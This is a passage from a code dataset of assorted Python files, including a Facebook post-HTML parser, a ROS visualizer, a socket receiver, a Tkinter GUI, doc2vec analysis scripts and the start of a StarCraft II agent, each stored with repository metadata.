verb_with_ending.find(u'ё') == -1:\n\t\tif stress_pos == len(verb_with_ending):\n\t\t\tverb_with_ending += \"'\"\n\t\telse:\n\t\t\tverb_with_ending = verb_with_ending[:stress_pos] + \"'\" + verb_with_ending[stress_pos:]\n\n\t# change the apostrophe to a Unicode stress mark (\\u0301)\n\treturn format_stress_mark(verb_with_ending)","sub_path":"conjugate_verb.py","file_name":"conjugate_verb.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607980193","text":"# coding: utf-8\n\nimport os\nimport json\nfrom easydict import EasyDict as edict\n\ndef process_config(jsonfile=None):\n \"\"\"\n 读取json配置文件\n :param jsonfile: json配置文件名\n :return: \n \"\"\"\n try:\n if jsonfile is not None:\n with open(jsonfile, 'r') as config_file:\n 
config_args_dict = json.load(config_file)\n else:\n raise TypeError(\"Add a config file using file_name.json\")\n\n except FileNotFoundError:\n raise TypeError(\"ERROR: Config .json file not found\")\n except json.decoder.JSONDecodeError:\n raise TypeError(\"ERROR: Config file is not a proper JSON file!\")\n\n config_args = edict(config_args_dict)\n\n print(config_args)\n print(\"\\n\")\n\n return config_args\n","sub_path":"json_utils.py","file_name":"json_utils.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490371856","text":"import datetime\nimport json\nimport re\nimport time\n\nimport bs4\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\nfrom scrapy.selector import Selector\nimport re\nimport html.entities\nfrom bs4 import BeautifulSoup as bs\nfrom urllib import parse\nfrom scrapy.selector import Selector\nimport re\nimport html.entities\nfrom bs4 import BeautifulSoup as bs\nfrom urllib import parse\nfrom scrapy.selector import Selector\ndef check_month(month):\n if month == \"January\" or month == \"Jan\":\n month = '1'\n elif month == \"February\" or month == \"Feb\":\n month = '2'\n elif month == \"March\" or month == \"Mar\":\n month = '3'\n elif month == \"April\" or month == \"Apr\":\n month = '4'\n elif month == \"May\" or month == \"May\":\n month = '5'\n elif month == \"June\" or month == \"Jun\":\n month = '6'\n elif month == \"July\" or month == \"Jul\":\n month = '7'\n elif month == \"August\" or month == \"Aug\":\n month = '8'\n elif month == \"September\" or month == \"Sep\":\n month = '9'\n elif month == \"October\" or month == \"Oct\":\n month = '10'\n elif month == \"November\" or month == \"Nov\":\n month = '11'\n elif month == \"December\" or month == \"Dec\":\n month = '12'\n return month\n\n\ndef check_day(day):\n day_int = -1\n if day == \"Monday\":\n day_int = 0\n elif day == \"Tuesday\":\n day_int = 1\n elif day == 
\"Wednesday\":\n day_int = 2\n elif day == \"Thursday\":\n day_int = 3\n elif day == \"Friday\":\n day_int = 4\n elif day == \"Saturday\":\n day_int = 5\n elif day == \"Sunday\":\n day_int = 6\n return day_int\ndef change_timestamp(timestamp):\n # September 25, 2018 at 7:08 PM || April 1, 2018 at 11:53 AM || November 5, 2018\n if len(timestamp.split(',')) == 2:\n year = timestamp.split(\",\")[1].split('at')[0].strip()\n month = check_month(timestamp.split(\",\")[0].split(\" \")[0].strip())\n day = timestamp.split(\",\")[0].split(\" \")[1].strip()\n if \"at\" in timestamp:\n hour = timestamp.split(\",\")[1].split('at')[1].split(\":\")[0].strip()\n minute = timestamp.split(\",\")[1].split('at')[1].split(\":\")[1].split(' ')[0].strip()\n zone = timestamp.split(\",\")[1].split('at')[1].split(\":\")[1].split(' ')[1].strip()\n if zone == \"PM\":\n hour = str(int(hour) + 12)\n if hour == \"24\":\n hour = \"00\"\n timeInt = year + \"-\" + month + \"-\" + day + \" \" + hour + \":\" + minute\n else:\n timeInt = year + \"-\" + month + \"-\" + day\n # April 15 at 12:17 PM\n elif len(timestamp.split('at')) == 2 and \"Yesterday\" not in timestamp:\n hour = timestamp.split('at')[1].split(\":\")[0].strip()\n minute = timestamp.split('at')[1].split(\":\")[1].split(\" \")[0].strip()\n try:\n zone = timestamp.split('at')[1].split(\":\")[1].split(\" \")[1].strip()\n if zone == \"PM\":\n hour = str(int(hour) + 12)\n if hour == \"24\":\n hour = \"00\"\n except:\n pass\n year = time.strftime('%Y', time.localtime(time.time()))\n day_or_month = timestamp.split('at')[0].split(' ')[0].strip()\n check_day_or_month = check_day(day_or_month)\n if check_day_or_month > -1:\n day_sub = datetime.date.today().weekday() - check_day_or_month\n year_month_day = datetime.date.today() - datetime.timedelta(day_sub)\n timeInt = str(year_month_day) + \" \" + hour + \":\" + minute\n else:\n try:\n int(day_or_month)\n # 2 July\n month = timestamp.split('at')[0].split(' ')[1].strip()\n month = 
check_month(month)\n day = timestamp.split('at')[0].split(' ')[0].strip()\n except:\n # July 23\n month = check_month(day_or_month)\n day = timestamp.split('at')[0].split(' ')[1].strip()\n timeInt = year + \"-\" + month + \"-\" + day + \" \" + hour + \":\" + minute\n # 10 hrs\n elif 'hrs' in timestamp or 'hr' in timestamp:\n hour_temp = timestamp.split(' ')[0]\n timeInt = (datetime.datetime.now() - datetime.timedelta(hours=int(hour_temp))).strftime('%Y-%m-%d %H:%M')\n # 30 mins\n elif 'mins' in timestamp or 'min' in timestamp:\n minute = timestamp.split(' ')[0]\n timeInt = (datetime.datetime.now() - datetime.timedelta(minutes=int(minute))).strftime('%Y-%m-%d %H:%M')\n # Yesterday at 12:32 AM\n elif 'Yesterday' in timestamp:\n hour = timestamp.split('at')[1].split(':')[0].strip()\n if hour:\n if timestamp.split('at')[1].split(':')[1].split(' ')[1].strip() == 'PM':\n hour = str(int(hour) + 12)\n if hour == \"24\":\n hour = \"00\"\n minute = timestamp.split('at')[1].split(':')[1].split(' ')[0].strip()\n timeInt = (datetime.datetime.today() - datetime.timedelta(days=1)).strftime(\n '%Y-%m-%d') + \" \" + hour + \":\" + minute\n # Apr 22 or July 2012 or 22 Apr\n elif len(timestamp.split(\" \")) == 2:\n year = time.strftime('%Y', time.localtime(time.time()))\n month, day = timestamp.split(\" \")\n try:\n int(day)\n except:\n temp = month\n month = day\n day = temp\n if re.match(r\"[0-9]{4}\", day):\n year = day\n day = \"1\"\n month = check_month(month)\n timeInt = year + \"-\" + month + \"-\" + day\n else:\n timeInt = time.strftime('%Y-%m-%d %H:%M', time.localtime(time.time()))\n return timeInt\nres = ''\nwith open('content_json.txt',encoding='utf-8') as f:\n res += f.readline()\n\nres = res.replace('for (;;);', '')\nres = json.loads(res)\nhtml = res['payload']['actions'][0]['html']\nsoup = BeautifulSoup(html,\"html.parser\",from_encoding='utf-8')\nfor article in soup.find_all('article'):\n selector = Selector(text=str(article))\n post_id_pattern = 
selector.xpath('.//@data-ft').get()\n if post_id_pattern:\n post_id = re.search('\"tl_objid\":\"(.+?)\"', post_id_pattern).group(1)\n else:\n post_id = ''\n stamp_time = selector.xpath(\".//div/a/abbr/text()\").get()\n if stamp_time:\n timestamp = stamp_time\n TimeStamp = change_timestamp(timestamp)\n try:\n datetime_obj = datetime.datetime.strptime(TimeStamp, '%Y-%m-%d %H:%M')\n except:\n datetime_obj = datetime.datetime.strptime(TimeStamp, '%Y-%m-%d')\n TimeStampInt = int(time.mktime(datetime_obj.timetuple()) * 1000.0)\n else:\n timestamp = 'Now'\n TimeStamp = change_timestamp(timestamp)\n datetime_obj = datetime.datetime.strptime(TimeStamp, '%Y-%m-%d %H:%M')\n TimeStampInt = int(time.mktime(datetime_obj.timetuple()) * 1000.0)\n\n # location\n location = selector.xpath(\".//div/div[2]/div[1]/a/text()\").get()\n if location is None:\n location = ''\n # like_people_num\n like_relation_pattern = selector.xpath(\".//footer\")\n like_people_num = 0\n if len(like_relation_pattern) > 0:\n if like_relation_pattern.xpath(\".//a/@href\").get():\n comment_url = 'https://m.facebook.com' + like_relation_pattern.xpath(\".//a/@href\").get()\n else:\n comment_url = \"\"\n if like_relation_pattern.xpath(\".//a//div/text()\").get():\n like_people_num = like_relation_pattern.xpath(\".//a//div/text()\").get()\n if 'K' in like_people_num:\n like_people_num = int(re.search('\\d+', like_people_num).group(0)) * 1000\n else:\n like_people_num = int(re.search('\\d+', like_people_num).group(0))\n\n else:\n like_people_num = 0\n comment_num = like_relation_pattern.xpath('.//div[@class=\"_1fnt\"]/span[@data-sigil=\"comments-token\"]/text()')\n if comment_num:\n comments_people = comment_num.get()\n # print(comments_people)\n if 'Comments' in comments_people:\n comments_people = (comments_people.split(' ')[0])\n # print(comments_people_)\n if 'K' in comments_people:\n comments_people_num = float(re.search('\\d+(\\.\\d+)?', comments_people).group(0)) * 1000\n comments_people_num = 
int(comments_people_num)\n else:\n comments_people_num = int(re.search('\\d+(\\.\\d+)?', comments_people).group(0))\n else:\n comments_people_num = 0\n else:\n comments_people_num = 0\n # the title of post\n title = \"\"\n retweetFromName = ''\n isRetweet = False\n retweetContent = ''\n img_content = []\n screen_urp = selector.xpath('.//strong/a/@href').get()\n screen_name = screen_urp.split('?')[0].split('/')[1]\n screen_url = 'https://m.facebook.com' + screen_urp\n is_retweet_article = selector.xpath(\"//article\")\n if len(is_retweet_article) == 2:\n is_retweet_article = is_retweet_article[-1]\n isRetweet = True\n retweetFromName = is_retweet_article.xpath(\".//h3/strong/a/text()\").get()\n retweetContent = is_retweet_article.xpath(\".//p/text()\").get()\n content = selector.xpath(\"string(.//div/div[1]/span/p)\").get()\n else:\n content = selector.xpath(\".//p/text()\").get()\n # img_content = selector.xpath(\"//div/div[2]//img/@src\").getall()\n post_images_array = []\n post_images = selector.xpath('.//div/div[2]//div//i/@style').get()\n if post_images:\n if 'static.xx' not in post_images:\n post_images = post_images.replace('\\'', '\"')\n post_images = post_images.replace(\"\\\\3a \", \":\")\n post_images = post_images.replace(\"\\\\3d \", \"=\")\n post_images = post_images.replace(\"\\\\26 \", \"&\")\n post_images = post_images.replace(\"\\\\\", \"\")\n post_images = re.search(r'url\\(\"(.+?)\"', post_images).group(1)\n post_images_array.append(post_images)\n print('1')","sub_path":"fb/content_json.py","file_name":"content_json.py","file_ext":"py","file_size_in_byte":10012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503359567","text":"#! 
/usr/bin/env python\n'''\nCreated on Apr 28, 2020\n\n@author: kyberszittya\n'''\n\nimport rospy\n\nfrom rei_monitoring_msgs.msg import DetectedObstacles\nfrom visualization_msgs.msg import MarkerArray, Marker\n\nclass PerceptionVisualizer(object):\n \n def __init__(self):\n self.msg_viz = MarkerArray()\n self.pub_obstacle_publisher = rospy.Publisher(\"/rei_perception/viz\", MarkerArray, queue_size=1) \n self.sub_detected_obstacles = rospy.Subscriber(\"/rei_perception_monitor/detected_obstacles\", DetectedObstacles, self.cbDetectedObstacles)\n \n \n \n def cbDetectedObstacles(self, data):\n self.msg_viz.markers = []\n for o in data.obstacles:\n m = Marker()\n m.header.frame_id = data.header.frame_id\n m.header.stamp = data.header.stamp\n m.pose = o.pose\n m.type = Marker.SPHERE\n m.scale.x = 1.0\n m.scale.y = 1.0\n m.scale.z = 1.0\n \n m.color.r = 1.0\n m.color.g = 0.0\n m.color.b = 0.0\n m.color.a = 1.0\n \n self.msg_viz.markers.append(m)\n self.pub_obstacle_publisher.publish(self.msg_viz)\n\ndef main():\n rospy.init_node(\"perception_visualization\")\n visualizer = PerceptionVisualizer()\n rospy.spin()\n \n \nif __name__==\"__main__\":\n main()\n\n","sub_path":"rei/rei_perception_monitor/scripts/visualization/perception_visualization.py","file_name":"perception_visualization.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546490073","text":"# Helper to receive packets\n# This class object creates a thread to listen on a socket, and passes all messages from the socket to the manager\n\nimport sys, time\nimport threading\nimport socket, select\n# our own custom libraries/modules\nfrom protocol.protocol import *\n\nclass Receiver:\n\n def __init__(self, manager, sock):\n self.manager = manager # save the manager so we can reference it later to pass messages\n self.sock = sock\n\n # create the thread and begin listening on socket\n def beginListening(self):\n sock = 
self.sock\n manager = self.manager\n\n # function to hold the thread\n def listenFunc():\n while True:\n time.sleep(0.0) # wait interval\n\n # if the manager signifies that the program is over, kill this thread\n if (manager.kill):\n break;\n\n # we attempt to receive the next message\n try:\n hasr, _, _ = select.select([sock], [], [])\n # check to make sure a message exists to be received\n if hasr:\n r = sock.recv(1024) # get a message\n if (len(r) == 0): continue # ignore if no message\n r = r.decode() # get the message\n\n self.processMessage(r) # send the message to process\n except Exception:\n # an exception occurs if we were unable to read from the socket, signifiying something went wrong (most likely the socket closed/server died)\n manager.kill = True\n break\n\n\n # create the thread with the function we defined\n self.thread = threading.Timer(0.0, listenFunc, () )\n self.thread.start()\n\n def processMessage(self, message):\n # pass message to manager\n self.manager.processMessage(message)\n\n\n","sub_path":"tictactwo/client/handlers/recv.py","file_name":"recv.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385165962","text":"# Copyright 2020 Alexis Lopez Zubieta\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\nfrom .interpreter import Interpreter\nfrom .base_helper import BaseHelper\nfrom .fontconfig import 
FontConfig\nfrom .gstreamer import GStreamer\nfrom .java import Java\nfrom .libgl import LibGL\nfrom .openssl import OpenSSL\nfrom .qt import Qt\nfrom .gdk_pixbuf import GdkPixbuf\nfrom .gtk import Gtk\nfrom .glib_schemas import GLibSchemas\n\n\nclass HelperFactoryError(RuntimeError):\n pass\n\n\nclass HelperFactory:\n def __init__(self, app_dir, app_dir_cache):\n self.app_dir = app_dir\n self.app_dir_cache = app_dir_cache\n\n self.helpers = {\n \"loader\": Interpreter,\n \"fontconfig\": FontConfig,\n \"openssl\": OpenSSL,\n \"qt\": Qt,\n \"libgl\": LibGL,\n \"gstreamer\": GStreamer,\n \"gdk_pixbuf\": GdkPixbuf,\n \"gtk\": Gtk,\n \"glib_schemas\": GLibSchemas,\n \"java\": Java,\n }\n\n def get(self, id) -> BaseHelper:\n if id in self.helpers:\n obj = self.helpers[id](self.app_dir, self.app_dir_cache)\n return obj\n else:\n raise HelperFactoryError(\"%s: unknown helper id\" % id)\n\n def list(self):\n return self.helpers.keys()\n","sub_path":"appimagebuilder/app_dir/runtime/helpers/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162260261","text":"#05. 
n-gram\n#与えられたシーケンス(文字列やリストなど)からn-gramを作る関数を作成せよ.\n#この関数を用い,\"I am an NLPer\"という文から単語bi-gram,文字bi-gramを得よ.\n\nstr = 'I am an NLPer'\nword = str.split(' ')\n\ndef n_gram(list,n):\n gram = []\n for i in range(len(list) - n + 1):\n gram.append(list[i:i+n]) \n return gram\n\nif __name__ == \"__main__\":\n print(n_gram(str,2))\n print(n_gram(word,2))","sub_path":"section1/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198449411","text":"#!/usr/bin/python\r\n################################################################################\r\n# PROCEDURE EXECUTION\r\n#\r\n#\r\n# 11/05/2015 Original construction\r\n# 11/17/2015 Added CLI log data to status output\r\n################################################################################\r\n\r\nimport traceback\r\nimport time\r\n\r\nfrom Tkinter import *\r\nfrom globals import *\r\nfrom random import random\r\n\r\nfrom ..db.user import get_name as get_user_name\r\nfrom ..db.procedure import get_name as get_prc_name\r\nfrom ..db.host import get_host\r\nfrom ..db.result import (get_prc_gui_data, del_result)\r\nfrom ..db.queue import queue_procedure\r\nfrom ..db.logger import (add_message, get_message)\r\nfrom ..db.status import get_friendly_text\r\nfrom ..view.reports import ReportGenerator\r\nfrom .selection_gui import SelectionGUI\r\n\r\nfrom os import popen\r\n\r\nclass ProcedureExecution:\r\n def close(self):\r\n self.__master.destroy()\r\n\r\n def __display_worker(self):\r\n start_time = time.time()\r\n \r\n self.__output_text.delete(1.0, END)\r\n for procedure_uuid, procedure_value in self.procedure_selection.get_selected().iteritems():\r\n for host_uuid, host_value in self.host_selection.get_selected().iteritems():\r\n self.__output_text.insert(END, \"Procedure: {0}\\n Host: {1}\\n\".format(procedure_value, host_value))\r\n for row in get_prc_gui_data(procedure_uuid, 
host_uuid):\r\n timestamp = time.strftime('%H:%M:%S', time.localtime(int(float(row[3]))))\r\n self.__output_text.insert(END, \" {0:40} {1} {2}\\n\".format(row[6][:40], timestamp, row[5]))\r\n self.__output_text.see(END)\r\n \r\n self.__message_text.delete(1.0, END)\r\n messages = get_message(start_time = time.time() - 60, stop_time = time.time())\r\n for row in messages:\r\n timestamp = time.strftime('%H:%M:%S', time.localtime(int(float(row[0]))))\r\n for line in row[1].split(\"\\n\"):\r\n self.__message_text.insert(END, \"{0} {1}\\n\".format(timestamp, line))\r\n self.__message_text.see(END)\r\n \r\n self.__master.after(int(DISPLAY_WORKER_DELAY_MULT * (time.time() - start_time) * 1000 * (.5 + random())), self.__display_worker)\r\n \r\n def __run(self):\r\n self.__current_start_time = time.time()\r\n for procedure_uuid, procedure_value in self.procedure_selection.get_selected().iteritems():\r\n for host_uuid, host_value in self.host_selection.get_selected().iteritems():\r\n del_result(procedure_uuid = procedure_uuid, host_uuid = host_uuid)\r\n \r\n try:\r\n procedure_str = get_prc_name(procedure_uuid, self.__current_user_uuid)\r\n except Exception:\r\n procedure_str = \"procedure {0}\".format(procedure_uuid)\r\n \r\n try:\r\n host, name, owner, mode = get_host(host_uuid, self.__current_user_uuid)\r\n host_str = name\r\n except Exception:\r\n host_str = \"host {0}\".format(host_uuid)\r\n \r\n try:\r\n user_str = get_user_name(self.__current_user_uuid)\r\n except Exception:\r\n user_str = \"user {0}\".format(self.__current_user_uuid)\r\n \r\n try:\r\n queue_procedure(self.__current_user_uuid, host_uuid, procedure_uuid)\r\n except Exception:\r\n add_message(time.time(), \"Queuing {0}@{1}:{2} failed\\n{3}\".format(user_str, host_str, procedure_str, traceback.format_exc()))\r\n \r\n def __gen_report(self):\r\n report = ReportGenerator(\"temp.html\")\r\n \r\n host_uuids = []\r\n for host_uuid, host_value in self.host_selection.get_selected().iteritems():\r\n 
host_uuids.append(host_uuid)\r\n \r\n procedure_uuids = []\r\n for procedure_uuid, procedure_value in self.procedure_selection.get_selected().iteritems():\r\n procedure_uuids.append(procedure_uuid)\r\n \r\n report.write_procedure(procedure_uuids, host_uuids)\r\n \r\n report.close()\r\n \r\n def __init__(self, master, user_uuid):\r\n self.__master = master\r\n Grid.rowconfigure(self.__master, 0, weight = 1)\r\n Grid.rowconfigure(self.__master, 1, weight = 1)\r\n Grid.columnconfigure(self.__master, 0, weight = 1)\r\n Grid.columnconfigure(self.__master, 1, weight = 1)\r\n \r\n self.__current_user_uuid = user_uuid\r\n self.__current_start_time = time.time()\r\n \r\n #### PROCEDURES FRAME ################################\r\n procedures_frame = LabelFrame(self.__master, text = \"Procedures\", padx = 5, pady = 5)\r\n procedures_frame.grid(column = 0, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W) \r\n self.procedure_selection = SelectionGUI(procedures_frame)\r\n \r\n #### HOSTS FRAME #####################################\r\n hosts_frame = LabelFrame(self.__master, text = \"Hosts\", padx = 5, pady = 5)\r\n hosts_frame.grid(column = 0, columnspan = 1, row = 1, rowspan = 1, sticky = N + S + E + W) \r\n self.host_selection = SelectionGUI(hosts_frame)\r\n \r\n #### EXECUTE FRAME ###################################\r\n execute_frame = LabelFrame(self.__master, text = \"Execute\", padx = 5, pady = 5)\r\n execute_frame.grid(column = 1, columnspan = 1, row = 0, rowspan = 2, sticky = N + S + E + W)\r\n Grid.columnconfigure(execute_frame, 0, weight = 1)\r\n Grid.rowconfigure(execute_frame, 0, weight = 0)\r\n Grid.rowconfigure(execute_frame, 1, weight = 1)\r\n Grid.rowconfigure(execute_frame, 2, weight = 0)\r\n \r\n #### BUTTON FRAME ####################################\r\n button_frame = Frame(execute_frame)\r\n button_frame.grid(column = 0, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W)\r\n Grid.columnconfigure(button_frame, 0, weight = 1)\r\n 
Grid.columnconfigure(button_frame, 1, weight = 1)\r\n Grid.rowconfigure(button_frame, 0, weight = 1)\r\n \r\n run_btn = Button(button_frame, text = \"Run\", command = self.__run)\r\n run_btn.grid(column = 0, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W) \r\n \r\n gen_report_btn = Button(button_frame, text = \"Generate Report\", command = self.__gen_report)\r\n gen_report_btn.grid(column = 1, columnspan = 1, row = 0, rowspan = 1, sticky = N + S + E + W) \r\n \r\n #### OUTPUT FRAME ####################################\r\n output_frame = LabelFrame(execute_frame, text = \"Output\", padx = 5, pady = 5)\r\n output_frame.grid(column = 0, columnspan = 1, row = 1, rowspan = 2, sticky = N + S + E + W) \r\n self.__output_text = Text(output_frame, \\\r\n wrap = NONE, \\\r\n height = 10)\r\n self.__output_text.pack(expand = True, fill = \"both\")\r\n \r\n #### MESSAGE FRAME ###################################\r\n self.__message_frame = LabelFrame(self.__master, text = \"Messages\", padx = 5, pady = 5)\r\n self.__message_frame.grid(column = 0, columnspan = 2, row = 2, rowspan = 1, sticky = N + S + E + W) \r\n self.__message_text = Text(self.__message_frame, wrap = NONE, height = 10)\r\n self.__message_text.pack(expand = True, fill = \"both\")\r\n \r\n self.__master.after(0, self.__display_worker)","sub_path":"valarie/gui/procedure_execution.py","file_name":"procedure_execution.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"406965024","text":"import time\nfrom bs4 import BeautifulSoup\n\nhtml = \"\"\"

test

\"\"\"\n\nstart_time = time.time()\nBeautifulSoup(html, 'lxml') # logic을 많이 알아야 사용가능 빠르지만 불편함\nlxml_end_time = time.time() - start_time\n\nstart_time = time.time()\nBeautifulSoup(html, 'html5lib') # 브라우저 기반에서 사용가능 느리지만 편함\nhtml5lib_end_time = time.time() - start_time\n\nprint('lxml 시간측정 : %f' %(lxml_end_time))\nprint('html5lib 시간측정 : %f' %(html5lib_end_time))\nprint(html5lib_end_time / lxml_end_time)\n\n\n# 라이브러리로 html을 tag형태로 만들어주는 시간\n# 어떤 파서 쓸지? 양쪽에서 다 되는지 - > 빠른 것 선택\n","sub_path":"12091906.py","file_name":"12091906.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"101895851","text":"class Solution(object):\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n v1_list = version1.split(\".\")\n v2_list = version2.split(\".\")\n \n for i in xrange(max(len(v1_list), len(v2_list))):\n v1 = v1_list[i] if i < len(v1_list) else 0\n v2 = v2_list[i] if i < len(v2_list) else 0\n if int(v1) < int(v2):\n return -1\n elif int(v1) > int(v2):\n return 1\n \n return 0","sub_path":"src/main/java/com/practice/python/compare_version_numbers.py","file_name":"compare_version_numbers.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"609299949","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = \"MPZinke\"\n\n###########################################################################\n#\n#\tcreated by: MPZinke\n#\ton ..\n#\n#\tDESCRIPTION:\n#\tBUGS:\n#\tFUTURE:\n#\n###########################################################################\n\nfrom threading import Thread\nfrom time import sleep\n\nfrom Definitions import *\n\nimport AdafruitFeed\nimport DaytimeEvents\nimport ErrorWriter\nimport EventPredictor\n\n\ndef main():\n\t# program loop\n\twhile True:\n\t\ttry:\n\t\t\tthreads 
=\t[\n\t\t\t\t\t\t\tThread(target=AdafruitFeed.start_client_loop),\n\t\t\t\t\t\t\tThread(target=DaytimeEvents.sunrise_loop),\n\t\t\t\t\t\t\tThread(target=DaytimeEvents.sunset_loop),\n\t\t\t\t\t\t\tThread(target=EventPredictor.predictor_loop)\n\t\t\t\t\t\t]\n\t\t\tfor thread in threads:\n\t\t\t\tthread.start()\n\t\t\tfor thread in threads:\n\t\t\t\tthread.join()\n\n\t\texcept Exception as error:\n\t\t\ttry: ErrorWriter.write_error(error) # doubly protect main program loop\n\t\t\texcept: print(error)\n\t\tsleep(ERROR_WAIT) # something messed up; give it time to reset\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"DatabasePortal/Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314262655","text":"'''Running and saving results explored in \n doc2vec_robustness_correlations.ipynb\n'''\n\n\nimport numpy as np\nimport os,sys\nimport pandas as pd\nimport glob\nfrom scipy.stats import pearsonr, spearmanr\nfrom scipy.spatial.distance import pdist,cdist\n\n\n## add src-path\n# src_dir = os.path.abspath(os.path.join(os.pardir,os.pardir,'src'))\n# sys.path[0] = src_dir\n\npath_data = os.path.abspath('/scratch2/gerlach/Dropbox (Uzzi Lab)/WoS/wos-text-dynamics-data/d2v-wos')\n\n\n## mapping of model and the corresponding filename\n\ndict_model_fname = {\n '100-5-5-0': \\\n ['doc_features_normed_100-5-5.npy.1M.lv_coords',\\\n 'doc_features_normed_100-5-5.npy.indices_1M',\\\n 'model_100-5-5.npy.docvecs.doctag_syn0.npy']\n}\n\n## parameters\nN = 10**6 ## number of subsampled vectors (fixed to 1M at the moment)\n\nN_pairs = 10**6 # howmany pairs to compare\n# n_seed = 10\nmetric = 'euclidean' # which metric to use, default: cosine\n\n## select 2 models\n\nlist_models = sorted(list(dict_model_fname.keys()))\nprint(list_models)\n\nfor i_m,model in enumerate(list_models):\n\n\n filename_save = 
'doc2vec_2dproj_m%s_comparison_distances_%s_1M_N%s'\\\n %(model,metric,str(N_pairs))\n\n\n ## the 2D-projections - vectors\n ## these are 1M subsampled vectors\n path_read = os.path.join(path_data,model)\n fname_read = dict_model_fname[model][0]\n filename = os.path.join(path_read,fname_read)\n x= (np.loadtxt(filename))\n x_2D = x[1:,:]\n\n ## get corresponding indices in orginal dataset\n fname_read = dict_model_fname[model][1]\n filename = os.path.join(path_read,fname_read)\n with open(filename) as f:\n x=f.readlines()\n x_inds = [int(h) for h in x[0].split(',')]\n\n\n ## memory-map the original vectors\n fname_read = dict_model_fname[model][2] ## these are the normed vectors\n filename = os.path.join(path_read,fname_read)\n x1 = np.load(filename,mmap_mode='r')\n\n with open(filename_save,'w') as f:\n # np.random.seed(n_seed)\n i1,i2=0,0\n\n\n for i in range(N_pairs):\n i1,i2=0,0\n while i1 == i2:\n i1,i2 = np.random.randint(N,size=2)#np.random.choice(N,size=2,replace=False)\n \n ## distance in dataset 1\n vec1,vec2 = x_2D[i1],x_2D[i2]\n s1 = pdist([vec1,vec2],metric=metric)[0]\n \n ## distance in dataset 2\n vec1,vec2 = x1[x_inds[i1]],x1[x_inds[i2]]\n s2 = pdist([vec1,vec2],metric=metric)[0]\n\n # write to file\n f.write('%s \\t %s \\n'%(str(s1),str(s2)))","sub_path":"scripts/CORE/doc2vec_robustness_correlations_2dprojection.py","file_name":"doc2vec_robustness_correlations_2dprojection.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115972099","text":"import requests\nimport pytest\nfrom endpoint.EndPointFactory import EndPoint\n\n\ndef test_books():\n response = requests.get(EndPoint.BASE_URI_API)\n print(\"\\nStatus Code = \", response.status_code)\n print(\"Request URL = \", response.url)\n\n data = response.json()\n print(data)\n\n da1 = data['books'][0]['isbn']\n da2 = data['books'][0]['title']\n da3 = data['books'][0]['subTitle']\n da4 = 
data['books'][0]['author']\n da5 = data['books'][0]['publish_date']\n da6 = data['books'][0]['publisher']\n da7 = data['books'][0]['pages']\n da8 = data['books'][0]['description']\n da9 = data['books'][0]['website']\n\n assert da1 == EndPoint.isbn and type(da1) == str\n assert da2 == EndPoint.title and type(da2) == str\n assert da3 == EndPoint.subTitle and type(da3) == str\n assert da4 == EndPoint.author and type(da4) == str\n assert da5 == EndPoint.publish_date and type(da5) == str\n assert da6 == EndPoint.publisher and type(da6) == str\n assert da7 == EndPoint.pages and type(da7) == int\n assert da8 == EndPoint.description and type(da8) == str\n assert da9 == EndPoint.website and type(da9) == str\n","sub_path":"feature/test_API.py","file_name":"test_API.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19815516","text":"import random\nimport time\nimport math\nimport os.path\n\nimport numpy as np\nimport pandas as pd\n\nfrom pysc2.agents import base_agent\nfrom pysc2.env import sc2_env, run_loop\nfrom pysc2.lib import actions, features, units\nfrom absl import app\n\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom s10395.skdrl.pytorch.model.mlp import NaiveMultiLayerPerceptron\nfrom s10395.skdrl.common.memory.memory import ExperienceReplayMemory\nfrom s10395.skdrl.pytorch.model.dqn import DQN, prepare_training_inputs\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n#writer = SummaryWriter()\n\nclass ProtossAgentWithRawActsAndRawObs(base_agent.BaseAgent):\n actions = (\"do_nothing\",\n \"harvest_minerals\",\n \"build_pylon\",\n \"build_gateway\",\n \"train_zealot\",\n 